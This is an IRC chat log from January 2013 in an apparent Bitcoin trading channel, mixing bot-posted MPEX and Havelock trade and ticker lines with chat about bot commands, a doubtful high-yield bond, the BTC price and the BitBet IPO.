[MPEX] [S.DICE] 1800 @ 0.00460838 = 8.2951 BTC [-] Jan 10 16:42:05 [MPEX] [S.DICE] 579 @ 0.00469088 = 2.716 BTC [+] Jan 10 16:42:07 [MPEX] [S.DICE] 1796 @ 0.00472263 = 8.4818 BTC [+] Jan 10 16:42:08 [MPEX] [S.DICE] 1394 @ 0.00473591 = 6.6019 BTC [+] Jan 10 16:42:09 [MPEX] [S.DICE] 1231 @ 0.00474435 = 5.8403 BTC [+] Jan 10 16:42:39 [MPEX] [S.DICE] 559 @ 0.00460838 = 2.5761 BTC [-] Jan 10 16:42:41 [MPEX] [S.DICE] 2041 @ 0.004606 = 9.4008 BTC [-] Jan 10 16:44:36 [MPEX] [S.DICE] 1596 @ 0.004606 = 7.3512 BTC [-] Jan 10 16:46:17 doubt it, that 5000 shares was me :p Jan 10 16:46:49 heh Jan 10 16:46:59 im not that rich :p Jan 10 16:48:19 Provide exchange and ticker. Jan 10 16:48:19 !ticker S.DICE Jan 10 16:48:24 ok kakobrekla this is retardered. Jan 10 16:48:42 !ticker mpex s.dice Jan 10 16:48:44 [MPEX:S.DICE] 1D: 0.00459207 / 0.00470281 / 0.0048 (296240 shares, 1,393.16 BTC), 7D: 0.00360414 / 0.00433372 / 0.0048 (2234446 shares, 9,683.48 BTC), 30D: 0.0014 / 0.00343756 / 0.0048 (14318024 shares, 49,219.12 BTC) Jan 10 16:48:49 what Jan 10 16:48:55 that you now have to type two words ? Jan 10 16:49:04 uhum Jan 10 16:49:53 or else ill be doing 3+ requests each time trying to guess which exchange should i take ze data from Jan 10 16:50:29 lol Jan 10 16:50:35 are you guys high or something Jan 10 16:50:48 though so. Jan 10 16:51:05 well it's still the ux suck. Jan 10 16:52:20 you can censor just the selected lines Jan 10 16:52:48 !ticker havelock sdice Jan 10 16:52:51 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.483824289406 / 0.50000000 (387 shares, 187.24000000 BTC), 7D: 0.37000000 / 0.447719743063 / 0.62000000 (2958 shares, 1324.35499998 BTC), 30D: 0.37000000 / 0.447719743063 / 0.62000000 (2958 shares, 1324.35499998 BTC), Jan 10 16:53:14 !ticker h sidce Jan 10 16:53:15 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 10 16:53:22 !ticker h sdice Jan 10 16:53:23 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.483824289406 / 0.50000000 (387 shares, 187.24000000 BTC), 7D: 0.37000000 / 0.447719743063 / 0.62000000 (2958 shares, 1324.35499998 BTC), 30D: 0.37000000 / 0.447719743063 / 0.62000000 (2958 shares, 1324.35499998 BTC), Jan 10 16:53:51 just rounding the vwap Jan 10 16:53:56 !ticker havelock sdice Jan 10 16:53:57 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.48382429 / 0.50000000 (387 shares, 187.24000000 BTC), 7D: 0.37000000 / 0.44771974 / 0.62000000 (2958 shares, 1324.35499998 BTC), 30D: 0.37000000 / 0.44771974 / 0.62000000 (2958 shares, 1324.35499998 BTC), Jan 10 16:54:01 thats better Jan 10 16:54:09 you can use the short handle Jan 10 16:54:12 fyi Jan 10 16:54:31 cool yea i saw that Jan 10 16:54:38 h, hl and havelock all work? thats great :) Jan 10 16:54:53 lets check whats with the stream Jan 10 16:58:19 !ticker m s.dice Jan 10 16:58:20 [MPEX:S.DICE] 1D: 0.00459207 / 0.00470294 / 0.0048 (294040 shares, 1,382.85 BTC), 7D: 0.00360414 / 0.004334 / 0.0048 (2233496 shares, 9,679.98 BTC), 30D: 0.0014 / 0.00343756 / 0.0048 (14318024 shares, 49,219.12 BTC) Jan 10 16:58:27 a ok, that's not so horrid Jan 10 16:58:31 !ticker m dice Jan 10 16:58:32 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 10 16:58:36 !ticker m s.d Jan 10 16:58:38 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 10 16:58:47 naw man Jan 10 16:58:52 m s.dice Jan 10 16:58:55 mp s.dice Jan 10 16:58:57 mpex s.dice Jan 10 16:59:03 thats what you got Jan 10 16:59:07 i c Jan 10 16:59:09 [MPEX] [S.DICE] 531 @ 0.004606 = 2.4458 BTC [-] Jan 10 16:59:11 [MPEX] [S.DICE] 1881 @ 0.00460465 = 8.6613 BTC [-] Jan 10 16:59:22 ppl trying to sell me domain names ;/ Jan 10 16:59:31 hmm? Jan 10 16:59:37 ;;ticker glbse gsdpt Jan 10 16:59:38 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Jan 10 16:59:54 !ticker glbse gsdpt Jan 10 16:59:55 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 10 17:01:39 !ticker milk sour Jan 10 17:01:40 If the milk turns out to be sour, I aint the kinda pussy to drink it. Jan 10 17:01:44 :DD Jan 10 17:08:35 !ticker h him Jan 10 17:08:36 [HAVELOCK:HIM] 1D: / 0 / (0 shares, 0 BTC), 7D: 13.60000000 / 13.725 / 13.85000000 (2 shares, 27.45000000 BTC), 30D: 13.50000000 / 13.71 / 13.89000000 (4 shares, 54.84000000 BTC), Jan 10 17:09:29 kakobrekla: im okay if you want to take out the 7D so its the same as mpex (just 1D and 30D) or maybe mpex should add 7D :p Jan 10 17:09:52 i added 7d yesterday Jan 10 17:09:55 for mpex Jan 10 17:10:07 ah okay Jan 10 17:10:12 very cool Jan 10 17:10:18 !ticker h kcim Jan 10 17:10:19 [HAVELOCK:KCIM] 1D: 0.90000000 / 0.94125 / 0.99900000 (12 shares, 11.29500000 BTC), 7D: 0.62500000 / 0.92744898 / 1.00000000 (98 shares, 90.89000000 BTC), 30D: 0.50000000 / 0.95215385 / 1.00000000 (195 shares, 185.67000000 BTC), Jan 10 17:12:37 [HAVELOCK] [SDICE] 3 @ 0.49 = 1.47 BTC [-] Jan 10 17:16:52 buy buy buy Jan 10 17:17:36 ;;ticker Jan 10 17:17:36 BTCUSD ticker | Best bid: 13.98100, Best ask: 13.98101, Bid-ask spread: 0.00001, Last trade: 14.08900, 24 hour volume: 34079.24822671, 24 hour low: 13.65999, 24 hour high: 14.08900, 24 hour vwap: 13.88504 Jan 10 17:17:41 o wow 14 ejh Jan 10 17:18:26 https://bitcointalk.org/index.php?topic=133147.msg1444797#msg1444797 Jan 10 17:18:30 i still can;'t believe this idiot Jan 10 17:18:37 possibly the most incompetent scammer since shakuru Jan 10 17:18:43 or was it shakaru Jan 10 17:22:21 [MPEX] [S.DICE] 150 @ 0.004743 = 0.7115 BTC [+] Jan 10 17:24:00 "72th : initial PicoStock offering" Jan 10 17:24:01 lol Jan 10 17:24:07 72th ? Jan 10 17:24:18 72 jiggahash Jan 10 17:25:07 giggity giggity Jan 10 17:27:12 [HAVELOCK] [SDICE] 1 @ 0.49 BTC [-] Jan 10 17:27:58 [MPEX] [S.DICE] 685 @ 0.004743 = 3.249 BTC [+] Jan 10 17:30:35 bitinstant should get their shit together Jan 10 17:36:04 [MPEX] [S.DICE] 1045 @ 0.00473235 = 4.9453 BTC [-] Jan 10 17:38:11 EskimoBob: say what? Jan 10 17:38:28 kakobrekla what they do now !? Jan 10 17:38:57 oh Jan 10 17:38:57 i see Jan 10 17:39:05 yes i misunderstood you, sorry :p Jan 10 17:40:04 mircea_popescu, so i flip some money 2 days ago Jan 10 17:40:11 first it gives me an error Jan 10 17:40:23 the second try was 'successful' Jan 10 17:40:29 yet the result was 'error' Jan 10 17:40:33 heh Jan 10 17:40:36 aka ate my code Jan 10 17:40:40 didnt giev money Jan 10 17:40:52 teh suck Jan 10 17:40:53 i needed to wait over 24hrs Jan 10 17:41:00 [MPEX] [S.DICE] 1205 @ 0.00473235 = 5.7025 BTC [-] Jan 10 17:41:00 to get a response and a fix Jan 10 17:41:02 now Jan 10 17:41:08 the next day i try the same Jan 10 17:41:11 that was yesterday Jan 10 17:41:16 same fuckin shit happens. Jan 10 17:41:20 :\ Jan 10 17:41:27 ;;ticker Jan 10 17:41:27 BTCUSD ticker | Best bid: 14.05001, Best ask: 14.10000, Bid-ask spread: 0.04999, Last trade: 14.05000, 24 hour volume: 34922.38151352, 24 hour low: 13.65999, 24 hour high: 14.10000, 24 hour vwap: 13.89273 Jan 10 17:41:31 booya Jan 10 17:41:43 http://bitbet.us/bet/16/bitcoin-above-14-17/ Jan 10 17:42:33 not yet over .17 tho Jan 10 17:42:37 but certainly getting there Jan 10 17:47:08 Any of you guys invested some in ESECURITYSABTC on btct.co? Jan 10 17:47:52 not rly. Jan 10 17:47:55 what is it ? Jan 10 17:49:33 A Bond, pays 1.4% weekly, funds the purchase of servers of the company issuing it Jan 10 17:50:01 Dividends are 30% of the server profit, the company is legit and the guy issuing it is indeed part of the company Jan 10 17:50:11 But 1.4% seems still a bit too good to be true Jan 10 17:50:27 it is TGTBT Jan 10 17:50:43 https://btct.co/security/ESECURITYSABTC Jan 10 17:50:44 what is the revenue from? Jan 10 17:50:59 TGT are some cool wallets Jan 10 17:51:04 "Dividends Terms: 30% of the severs income in USD will be distribued monthly. 70% Jan 10 17:51:04 are held by the issuer for maintenance, bandwitch cost, company cost and some Jan 10 17:51:05 profits." Jan 10 17:51:10 DDoS "protection", perhaps? Jan 10 17:51:44 heh Jan 10 17:52:06 wait. Jan 10 17:52:09 dividends and coupon ? Jan 10 17:52:13 [MPEX] [S.DICE] 5000 @ 0.00460466 = 23.0233 BTC [-] Jan 10 17:52:15 [MPEX] [S.DICE] 19 @ 0.00460465 = 0.0875 BTC [-] Jan 10 17:52:16 [MPEX] [S.DICE] 1081 @ 0.00460282 = 4.9756 BTC [-] Jan 10 17:52:36 Well, BitVPS has had months of a 4% / mo div Jan 10 17:52:49 What happened to it? Jan 10 17:52:56 yes but i mean, paus 1.4% weekly. end of story. what dividends ? Jan 10 17:53:10 seems legit Jan 10 17:53:37 So you guys figure it leans more on the legit side with ESECURITYSABTC? Jan 10 17:53:55 no Jan 10 17:54:04 but its not completly impossible Jan 10 17:54:08 ian Jan 10 17:55:02 http://consciouslifenews.com/paid-internet-shill-shadowy-groups-manipulate-internet-opinion-debate/1147073/ Jan 10 17:55:03 pretty much any btc bond outside of mpoe's are nonsense. Jan 10 17:55:07 in pure economic terms, Jan 10 17:55:13 Sertuerner, i'd ask for some endorsements from existing customers, for a start Jan 10 17:55:14 ;;calc 1.014 ** 52 Jan 10 17:55:17 2.06050493901 Jan 10 17:55:25 who the fark pays 100% apr Jan 10 17:55:31 leaving aside the problem of btc price volatility. Jan 10 17:55:34 yeah Jan 10 17:55:38 on a fixed schedule Jan 10 17:55:49 talk about volatile Jan 10 17:55:55 if you have a floating rate based on profits, and you have an insane month, seems possible Jan 10 17:55:59 it was less than $14 yesterday Jan 10 17:56:04 jeez Jan 10 17:56:08 Well, the bond isn't nearly as advertised as the last ponzies I saw Jan 10 17:56:17 in fairness, the only other bond that was a bond in btc was yochdog Jan 10 17:56:22 he's cursing his fate atm, Jan 10 17:56:24 ;calc 14.10/13.75 Jan 10 17:56:26 and it was an experiment anyway. it failed. Jan 10 17:56:28 ;;calc 14.10/13.75 Jan 10 17:56:29 1.02545454545 Jan 10 17:56:37 [MPEX] [S.DICE] 1259 @ 0.00460282 = 5.795 BTC [-] Jan 10 17:56:40 not that volatile Jan 10 17:56:54 SP500 can move that much in a session Jan 10 17:56:58 Bugpowder 1 year term ? Jan 10 17:57:11 or 30 year ? Jan 10 17:57:22 ;;google NOK Jan 10 17:57:23 NOK: Summary for Nokia Corporation Sponsored Ame- Yahoo ...: ; Nokia Corporation (ADR): NYSE:NOK quotes & news - Google ...: ; NOK - Nokia Oyj Stock quote - CNNMoney.com: Jan 10 17:57:32 up 20% today Jan 10 17:57:37 dude. Jan 10 17:57:43 who the fuck floats bonds on stock Jan 10 17:58:04 "this T bill pays 180% face value in Google Stock" Jan 10 17:58:08 what's this, wet dreams inc ? Jan 10 17:58:32 I don't understand it, and I don't want to try Jan 10 17:58:41 [MPEX] [S.DICE] 300 @ 0.00460282 = 1.3808 BTC [-] Jan 10 17:58:45 If it doesn't make sense to mp, I'm not interested. Jan 10 17:58:58 lmao Jan 10 17:59:16 at this rate im getting sued. Jan 10 18:00:53 wait. waitwait. you're actually long nokia ?! Jan 10 18:01:41 no Jan 10 18:01:45 I have some S Jan 10 18:01:54 might move it to RIM Jan 10 18:03:52 oddly i don't know anyone who owns (or admits to owning) nok Jan 10 18:07:34 [MPEX] [S.DICE] 660 @ 0.00460282 = 3.0379 BTC [-] Jan 10 18:07:36 [MPEX] [S.DICE] 440 @ 0.00460245 = 2.0251 BTC [-] Jan 10 18:07:37 [MPEX] [S.DICE] 500 @ 0.00460057 = 2.3003 BTC [-] Jan 10 18:07:38 [MPEX] [S.DICE] 1000 @ 0.004599 = 4.599 BTC [-] Jan 10 18:07:39 [MPEX] [S.DICE] 600 @ 0.00459856 = 2.7591 BTC [-] Jan 10 18:08:13 Okay, I'll run this 1.4%/w bond by the board later today, let's see if they can find something fishy Jan 10 18:09:41 ;;ticker Jan 10 18:09:41 BTCUSD ticker | Best bid: 14.07002, Best ask: 14.09000, Bid-ask spread: 0.01998, Last trade: 14.09000, 24 hour volume: 35929.09864850, 24 hour low: 13.66000, 24 hour high: 14.15000, 24 hour vwap: 13.90986 Jan 10 18:10:22 happy to see we're breaking the $14 mark...haven't done that in a while Jan 10 18:13:36 well if it stays over it for more than a few hours, It will be ther first time since Aug 2011. Jan 10 18:14:16 for srs. Jan 10 18:14:43 has it been since August 2011? Jan 10 18:14:53 i thought we peaked around 15 again after pirate left Jan 10 18:14:59 only for a few hours Jan 10 18:15:12 so i'm not crazy Jan 10 18:15:21 hours are like days to me sometimes Jan 10 18:15:33 actually we peaked over 15 right BEFORE pirate left Jan 10 18:15:57 before, after. MNW/ ponzi boat Jan 10 18:15:58 the crash happened about 5 minutes after the BST closing forum post I Jan 10 18:16:01 there was a lot going on Jan 10 18:16:24 I wus watching, catching the falling knife Jan 10 18:16:26 ow Jan 10 18:18:48 indeed Jan 10 18:26:50 [MPEX] [S.DICE] 1800 @ 0.00463688 = 8.3464 BTC [+] Jan 10 18:27:03 [MPEX] [S.DICE] 200 @ 0.00470236 = 0.9405 BTC [+] Jan 10 18:27:05 [MPEX] [S.DICE] 2599 @ 0.00459856 = 11.9517 BTC [-] Jan 10 18:27:06 [MPEX] [S.DICE] 1800 @ 0.00459702 = 8.2746 BTC [-] Jan 10 18:27:07 [MPEX] [S.DICE] 369 @ 0.00459654 = 1.6961 BTC [-] Jan 10 18:27:08 [MPEX] [S.DICE] 2854 @ 0.00459401 = 13.1113 BTC [-] Jan 10 18:27:09 [MPEX] [S.DICE] 800 @ 0.0045931 = 3.6745 BTC [-] Jan 10 18:27:11 [MPEX] [S.DICE] 250 @ 0.00459208 = 1.148 BTC [-] Jan 10 18:27:12 [MPEX] [S.DICE] 1092 @ 0.00459207 = 5.0145 BTC [-] Jan 10 18:27:12 [MPEX] [S.DICE] 5121 @ 0.00458976 = 23.5042 BTC [-] Jan 10 18:27:13 [MPEX] [S.DICE] 1854 @ 0.00458909 = 8.5082 BTC [-] Jan 10 18:27:14 [MPEX] [S.DICE] 1250 @ 0.00458857 = 5.7357 BTC [-] Jan 10 18:27:15 [MPEX] [S.DICE] 2088 @ 0.00458358 = 9.5705 BTC [-] Jan 10 18:27:16 [MPEX] [S.DICE] 2150 @ 0.00458307 = 9.8536 BTC [-] Jan 10 18:27:17 [MPEX] [S.DICE] 1050 @ 0.00457981 = 4.8088 BTC [-] Jan 10 18:27:18 [MPEX] [S.DICE] 2453 @ 0.00457901 = 11.2323 BTC [-] Jan 10 18:27:19 [MPEX] [S.DICE] 1650 @ 0.00457809 = 7.5538 BTC [-] Jan 10 18:27:20 [MPEX] [S.DICE] 1981 @ 0.00457559 = 9.0642 BTC [-] Jan 10 18:27:21 [MPEX] [S.DICE] 950 @ 0.00457454 = 4.3458 BTC [-] Jan 10 18:27:21 [MPEX] [S.DICE] 1500 @ 0.00457426 = 6.8614 BTC [-] Jan 10 18:27:22 [MPEX] [S.DICE] 2150 @ 0.00457422 = 9.8346 BTC [-] Jan 10 18:27:23 [MPEX] [S.DICE] 1650 @ 0.00457332 = 7.546 BTC [-] Jan 10 18:27:25 [MPEX] [S.DICE] 1298 @ 0.00457248 = 5.9351 BTC [-] Jan 10 18:27:26 [MPEX] [S.DICE] 1900 @ 0.00457145 = 8.6858 BTC [-] Jan 10 18:27:27 [MPEX] [S.DICE] 1384 @ 0.00457112 = 6.3264 BTC [-] Jan 10 18:27:28 [MPEX] [S.DICE] 1250 @ 0.00457072 = 5.7134 BTC [-] Jan 10 18:27:29 [MPEX] [S.DICE] 1976 @ 0.00457045 = 9.0312 BTC [-] Jan 10 18:27:30 [MPEX] [S.DICE] 1381 @ 0.0045687 = 6.3094 BTC [-] Jan 10 18:28:38 o hey what happened here Jan 10 18:28:58 but anyway : it'd seem bitbet just paid its first referral comissions! Jan 10 18:31:43 [MPEX] [S.DICE] 1250 @ 0.00473711 = 5.9214 BTC [+] Jan 10 18:31:45 [MPEX] [S.DICE] 1413 @ 0.004743 = 6.7019 BTC [+] Jan 10 18:32:55 [MPEX] [S.DICE] 19 @ 0.00464527 = 0.0883 BTC [-] Jan 10 18:34:54 cut off the betting Jan 10 18:35:01 ;;ticker Jan 10 18:35:02 BTCUSD ticker | Best bid: 14.15068, Best ask: 14.17018, Bid-ask spread: 0.01950, Last trade: 14.17017, 24 hour volume: 37546.03361238, 24 hour low: 13.69100, 24 hour high: 14.17018, 24 hour vwap: 13.92522 Jan 10 18:35:24 cuttin Jan 10 18:35:33 ;;ticker Jan 10 18:35:33 BTCUSD ticker | Best bid: 14.15000, Best ask: 14.18900, Bid-ask spread: 0.03900, Last trade: 14.18900, 24 hour volume: 37580.20459013, 24 hour low: 13.69100, 24 hour high: 14.18900, 24 hour vwap: 13.92545 Jan 10 18:37:32 ;;ticker Jan 10 18:37:33 BTCUSD ticker | Best bid: 14.10000, Best ask: 14.18000, Bid-ask spread: 0.08000, Last trade: 14.19900, 24 hour volume: 37912.02384168, 24 hour low: 13.69100, 24 hour high: 14.19900, 24 hour vwap: 13.92810 Jan 10 18:37:44 LET IT RIDE Jan 10 18:37:53 no new bets are accepted Jan 10 18:37:58 it will take a min to update Jan 10 18:39:21 [MPEX] [S.DICE] 1200 @ 0.004743 = 5.6916 BTC [+] Jan 10 18:41:33 [MPEX] [S.DICE] 2103 @ 0.00464527 = 9.769 BTC [-] Jan 10 18:43:55 i need to improve this procedure Jan 10 18:44:05 btw, i placed hockey bet yest, can't find it, it was not approved Jan 10 18:44:16 dunno why Jan 10 18:44:28 KHL - HC Slovan Bratislava will beat HC Lev Praha Jan 10 18:44:30 this? Jan 10 18:44:44 yea Jan 10 18:44:45 i dunno, mp does this approving thingy Jan 10 18:44:53 i try to stay out of it :) Jan 10 18:45:13 ping him Jan 10 18:46:29 man Jan 10 18:46:34 not a lot of resistance Jan 10 18:46:44 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Jan 10 18:47:10 $14.42 seems likely now Jan 10 18:47:57 just yest i sold a chunk on bitstamp... for $13.50 :/ Jan 10 18:48:07 heh Jan 10 18:48:10 i sell all the time Jan 10 18:48:10 sux Jan 10 18:48:26 If I had >10,000 coins I would sell some Jan 10 18:48:29 but I don't Jan 10 18:49:20 whaio .18 eh ? Jan 10 18:49:29 [MPEX] [S.DICE] 1084 @ 0.004743 = 5.1414 BTC [+] Jan 10 18:52:02 selling is overrated. Jan 10 18:53:46 Yeah Jan 10 18:53:52 I sold it all once Jan 10 18:53:58 [MPEX] [S.DICE] 1150 @ 0.00464528 = 5.3421 BTC [-] Jan 10 18:53:59 then I bought it back the next day Jan 10 18:54:03 never again Jan 10 18:54:18 lol Jan 10 18:54:28 i never sold any yet. Jan 10 18:54:32 tho maybe i will. Jan 10 18:54:44 Unless I somehow acquire >$200,000 worth of coins, then I will take a little off the table Jan 10 18:54:51 well i been living from selling coin for over a year now Jan 10 18:55:02 but I don't want to pay cap gains on it Jan 10 18:55:24 jeez i couldn't fucking eat Jan 10 18:55:25 so prefer keeping it in coin Jan 10 18:55:31 i'd keep thinking this bread is bitcoin and starve. Jan 10 18:55:38 LOL Jan 10 18:56:16 its not ideal yea Jan 10 18:56:23 but it is what it is Jan 10 19:02:00 [MPEX] [S.DICE] 1088 @ 0.00471738 = 5.1325 BTC [+] Jan 10 19:02:01 [MPEX] [S.DICE] 1450 @ 0.00466444 = 6.7634 BTC [-] Jan 10 19:02:03 [MPEX] [S.DICE] 1496 @ 0.00464528 = 6.9493 BTC [-] Jan 10 19:06:14 [HAVELOCK] [SDICE] 1 @ 0.48 BTC [-] Jan 10 19:08:17 ;;ticker Jan 10 19:08:18 BTCUSD ticker | Best bid: 14.23227, Best ask: 14.26703, Bid-ask spread: 0.03476, Last trade: 14.26703, 24 hour volume: 38839.82278349, 24 hour low: 13.70001, 24 hour high: 14.28800, 24 hour vwap: 13.93873 Jan 10 19:08:25 breakout fo sho Jan 10 19:09:28 apparently a blip, someone just wanted to buy 4k in one go Jan 10 19:10:14 mircea_popescu, and can you say something about the disapproved (or still pending) bet? Jan 10 19:10:25 KHL - HC Slovan Bratislava will beat HC Lev Praha Jan 10 19:11:18 jurov aaapproved. Jan 10 19:11:48 [MPEX] [S.MPOE] 5346 @ 0.00065196 = 3.4854 BTC [+] Jan 10 19:11:50 [MPEX] [S.MPOE] 21950 @ 0.00065219 = 14.3156 BTC [+] Jan 10 19:11:51 [MPEX] [S.MPOE] 3333 @ 0.00065629 = 2.1874 BTC [+] Jan 10 19:11:58 thx! will try to stir up #bitcoin.cz nao Jan 10 19:12:18 >D Jan 10 19:16:36 [MPEX] [S.MPOE] 1000 @ 0.00062928 = 0.6293 BTC [-] Jan 10 19:17:53 mircea_popescu: i trade on mpex while i drive Jan 10 19:18:07 mpex has safety concerns Jan 10 19:18:09 jk Jan 10 19:18:10 what, you have an acct ? **** BEGIN LOGGING AT Fri Jan 11 00:08:48 2013 Jan 11 00:09:02 [MPEX] [S.DICE] 2700 @ 0.00456725 = 12.3316 BTC [+] Jan 11 00:09:32 ipo ? link pls :) Jan 11 00:09:44 lol ty jurov Jan 11 00:09:46 http://mpex.co/?mpsic=S.BBET Jan 11 00:09:52 error3477 http://mpex.co/?mpsic=S.BBET Jan 11 00:09:55 fucking win xp Jan 11 00:09:57 darn too slow Jan 11 00:10:09 fucking it retards Jan 11 00:10:11 thanks Jan 11 00:10:33 http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html#!/2013/01/0-day-17u10-spotted-in-while-disable.html Jan 11 00:10:37 java hole again. Jan 11 00:11:01 error3477 If 2MM share order at .001 shows up in the next 2 minutes... I'm comin' for you. Jan 11 00:11:23 lmao Jan 11 00:11:44 mircea_popescu: that domain is innacurate, the auther needs coffee Jan 11 00:11:48 author* Jan 11 00:12:11 [MPEX] [S.DICE] 1100 @ 0.00456725 = 5.024 BTC [+] Jan 11 00:12:12 [MPEX] [S.DICE] 2000 @ 0.00456689 = 9.1338 BTC [-] Jan 11 00:12:14 lol. Jan 11 00:14:41 ? Jan 11 00:15:29 Ok, I'm standing on the edge of my seat, waiting for the IPO. Jan 11 00:15:43 I'm too high or it's a 100btc ipo ? Jan 11 00:15:58 You're too high Jan 11 00:16:17 think about it Jan 11 00:16:35 the first block is priced at .1BTC for 10,000 share Jan 11 00:16:42 then increasing price Jan 11 00:17:15 well Jan 11 00:17:35 Namworld, you might want to get a drink... we are still 103 minutes away Jan 11 00:19:12 I haven't heard mircea tell the exact time. Jan 11 00:19:59 So I assume whenever Jan 11 00:20:46 [MPEX] [S.DICE] 1148 @ 0.00457447 = 5.2515 BTC [+] Jan 11 00:20:48 [MPEX] [S.DICE] 168 @ 0.00456689 = 0.7672 BTC [-] Jan 11 00:20:48 [MPEX] [S.DICE] 184 @ 0.0045663 = 0.8402 BTC [-] Jan 11 00:24:03 [MPEX] [S.MPOE] 5200 @ 0.00062769 = 3.264 BTC [-] Jan 11 00:25:38 Bugpowder lol the last block is what, 0.7 BTC ?\ Jan 11 00:25:46 Namworld midnight gmt Jan 11 00:27:28 not sure i understand Jan 11 00:27:37 [MPEX] [S.DICE] 1348 @ 0.0045663 = 6.1554 BTC [-] Jan 11 00:27:39 [MPEX] [S.DICE] 800 @ 0.00456573 = 3.6526 BTC [-] Jan 11 00:27:40 [MPEX] [S.DICE] 602 @ 0.00456513 = 2.7482 BTC [-] Jan 11 00:27:49 Ah, I was hoping it would be GMT Jan 11 00:28:39 wut Jan 11 00:28:51 Bugpowder the share blocks start at 1000 satoshi Jan 11 00:28:52 really, _really_, you say bitbet.us is worth 1400 usd? Jan 11 00:28:53 there's 300 of them Jan 11 00:28:56 the price of the last is Jan 11 00:29:05 ;;calc 1.03**300*1000 = Jan 11 00:29:05 Error: unexpected EOF while parsing (, line 1) Jan 11 00:29:07 ;;calc 1.03**300*1000 Jan 11 00:29:07 7098513.48262 Jan 11 00:29:39 that is not correct actually Jan 11 00:29:58 it should be 6991522 Jan 11 00:30:07 if the contract is stated correctly Jan 11 00:30:25 price is 1.03 * previous block Jan 11 00:30:43 so there are rounding effects that magnify Jan 11 00:30:50 :-) Jan 11 00:31:08 I doubt that block will sell Jan 11 00:31:11 EVER Jan 11 00:31:13 !!! Jan 11 00:31:40 but who knows Jan 11 00:31:57 maybe an ANONYMOUS INVESTOR will emerge! Jan 11 00:32:07 a ok. Jan 11 00:32:48 0.07 BTC per share? ouch Jan 11 00:32:52 Bugpowder, what it they're rounding up? Jan 11 00:33:19 700000 BTC valuation. Jan 11 00:33:30 [MPEX] [S.DICE] 940 @ 0.00463117 = 4.3533 BTC [+] Jan 11 00:33:46 Would take 70'000'000 BTC in debt Jan 11 00:33:51 bets* Jan 11 00:33:59 to get that back in fees. Jan 11 00:34:30 no that's 7 million... Jan 11 00:34:40 just that block Jan 11 00:35:11 no, 700000 Jan 11 00:35:20 it's 10mn shares. Jan 11 00:35:26 ;;calc 0.07*10000000 Jan 11 00:35:26 700000.0 Jan 11 00:35:44 of course, it's 10k shares at 0.07 so that's 7btc total. Jan 11 00:35:58 700 BTC* Jan 11 00:36:23 [MPEX] [S.DICE] 898 @ 0.00456513 = 4.0995 BTC [-] Jan 11 00:36:25 [MPEX] [S.DICE] 863 @ 0.00456409 = 3.9388 BTC [-] Jan 11 00:36:26 [MPEX] [S.DICE] 139 @ 0.00456388 = 0.6344 BTC [-] Jan 11 00:36:28 If every block sold at the ask the sale proceeds would be 24000.4168 Jan 11 00:36:32 BTC Jan 11 00:36:40 hey Jan 11 00:36:46 when does S.MPOE pay divs? Jan 11 00:37:10 http://slashdot.org/story/13/01/10/2147224/online-gambling-site-bets-on-bitcoin-to-avoid-us-laws Jan 11 00:37:16 gitmo in 3-2-.. Jan 11 00:37:24 Anduck, usually at caturday after last friday of the month Jan 11 00:37:53 'aighto Jan 11 00:37:58 Slashdot commenters are worse than reddit these days Jan 11 00:38:00 REALLY Jan 11 00:38:00 ty Jan 11 00:38:48 [MPEX] [S.DICE] 380 @ 0.00463117 = 1.7598 BTC [+] Jan 11 00:38:49 [MPEX] [S.DICE] 298 @ 0.00468145 = 1.3951 BTC [+] Jan 11 00:39:33 so umm Jan 11 00:39:40 This is not a bad point "Sounds like a dumb idea, until you realize that Chuck E. Cheese and similar businesses have, for decades, been using a similar tactic to avoid running afoul of gambling laws: You're not playing for gifts or money, you're playing for worthless tokens!" Jan 11 00:39:41 i received some btc.. but no idea why Jan 11 00:39:49 how much Anduck? Jan 11 00:39:55 <1btc Jan 11 00:39:58 I got 16BTC that just showed up one day Jan 11 00:39:58 but i think it was divs Jan 11 00:39:59 or somethign Jan 11 00:40:15 aight Jan 11 00:40:17 From and unknown address Jan 11 00:40:23 well i think this is legit and someone sent it on purpose Jan 11 00:40:25 figured it was Nefario fucking up again Jan 11 00:40:29 but i just cant remember what Jan 11 00:41:14 http://trilema.com/2013/sbbet-its-happening/ Jan 11 00:41:20 last minute release. Jan 11 00:41:23 some financials etc. Jan 11 00:41:52 Anduck maybe you bet ? Jan 11 00:42:58 God damn it, who do I email for some credits Jan 11 00:43:05 ahaha Jan 11 00:43:07 me. Jan 11 00:43:08 mircea_popescu: maybe Jan 11 00:43:14 i did bet Jan 11 00:43:17 but no idea on what Jan 11 00:43:18 and how much Jan 11 00:43:21 so check the resolved bets lol Jan 11 00:43:22 REALLY THIS IS .... SHIIT Jan 11 00:43:24 ok Jan 11 00:43:28 and you can search the site for the addy Jan 11 00:43:31 can i search the site with my addr? Jan 11 00:43:34 ahh, nice Jan 11 00:43:47 kakobrekla geniously implemented that "useless" feature Jan 11 00:43:52 which i realise actually kicks ass. Jan 11 00:44:16 Easiest 2.5 BTC I ever made Jan 11 00:44:20 mircea_popescu: i've made 2 bets with my address Jan 11 00:44:27 search only shows 1 Jan 11 00:44:31 fuck Jan 11 00:44:33 Shoulda added 50 BTC to over 14.17 Jan 11 00:44:37 I still can't read dammit Jan 11 00:44:50 Namworld proxy ? fix browser ? Jan 11 00:44:53 teh possibilities! Jan 11 00:45:11 Anduck oh ?! Jan 11 00:45:13 Can't you at least make public announcement not require credits? Such as MPOE statements and such? Jan 11 00:45:26 let me double check Jan 11 00:45:33 sure i can. i just don't want to. Jan 11 00:45:53 I can understand for the various articles to read. I don't see why announcements should be limited. Jan 11 00:46:09 namworld: http://www.proxies.by/cgi-proxy.htm Jan 11 00:46:11 way Jan 11 00:46:14 wat* Jan 11 00:46:19 no httpd logs? Jan 11 00:46:20 well, they're not Jan 11 00:46:20 i use this. with 